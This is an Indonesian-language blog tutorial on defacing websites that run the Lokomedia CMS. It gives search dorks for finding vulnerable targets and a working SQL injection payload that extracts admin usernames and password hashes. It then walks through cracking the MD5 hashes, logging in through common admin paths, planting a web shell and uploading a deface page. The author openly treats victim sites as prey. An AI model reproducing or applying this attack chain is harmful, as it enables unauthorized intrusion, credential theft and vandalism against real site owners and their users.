Cara Deface Website dengan Method SQL Lokomedia
Cara deface Web SQL dengan lokomedia memang menjadi salah satu tutorial hacking yang paling banyak digunakan. Hal ini dikarenakan, CMS lokomedia masih memiliki banyak sekali bug yang dapat di bobol oleh para hacker dengan mudah. Pada dasarnya, lokomedia merupakan CMS buatan anak bangsa Indonesia.
Jadi, tak heran jika CMS ini masih memiliki banyak sekali celah dan bug (VULN) yang dapat di bobol. Oleh sebab itu, jika Anda menemukan bug pada CMS lokomedia ini, tidak ada salahnya untuk memberitahukan kepada admin, agar CMS buatan Indonesia ini dapat terus berkembang.
Oh iya, kembali pada topik utama. Pada kesempatan kali ini admin akan membagikan tutorial tentang cara deface website Method SQL lokomedia. So, jika Anda tertarik untuk mencobanya, maka silahkan Anda simak tutorialnya hingga selesai.
Deface Website Method SQL Lokomedia
Sebenarnya, untuk cara deface web dengan Method SQL lokomedia cukup gampang untuk dilakukan jika Anda sudah memiliki web target yang masih VULN. Adapun langkah-langkahnya adalah sebagai berikut:
1. Pertama-tama silahkan Anda siapkan beberapa bahan-bahan terlebih dahulu, seperti dork sql lokomedia, script deface, dan juga lain-lainnya.
2. Kemudian, silahkan Anda dorking pada search Engine browser Chrome, untuk dork nya, silahkan Anda gunakan dork berikut, (kembangin lagi dork nya ea mhanx :v, biar dapat banyak mangsa)
- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
3. Pilih website target yang telah kalian dorking tersebut, maka Anda akan masuk ke halaman statis pada website tersebut. Selanjutnya, silahkan Anda masukkan xploit pada link halaman tersebut.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
4. Maka akan terlihat userlogin dan juga password dari website target tersebut, biar jelas, silahkan Anda klik View Source atau dengan menekan tombol CTRL + U. Cari </title> dan akan terlihat userlogin dan password-nya yang masih dalam keadaan terenscript. :v
5. Copy password tersebut, kemudian silahkan Anda decryptkan dengan menggunakan tool MD5 Decrypt Hashkiller Decrypter. Jika sudah, langsung saja Anda log-in ke web tersebut dengan cara:
- http://target.co.li/admin
- http://target.co.li/adminweb
- http://target.co.li/administrator
- http://target.co.li/redaktur
6. Jika sudah berhasil masuk ke dalam panel admin website tersebut, maka silahkan Anda tanam Shell dan juga upload script deface yang Anda punya.
Gimana mhanx? Mudah bukan?
Dengan yang dapat admin bagikan kali ini tentang Cara deface website dengan Method SQL Lokomedia terbaru 2019. Jika Anda bingung dengan cara diatas, maka silahkan bertanya pada kolom komentar yang tersedia dibawah. Semoga bermanfaat dan terima kasih,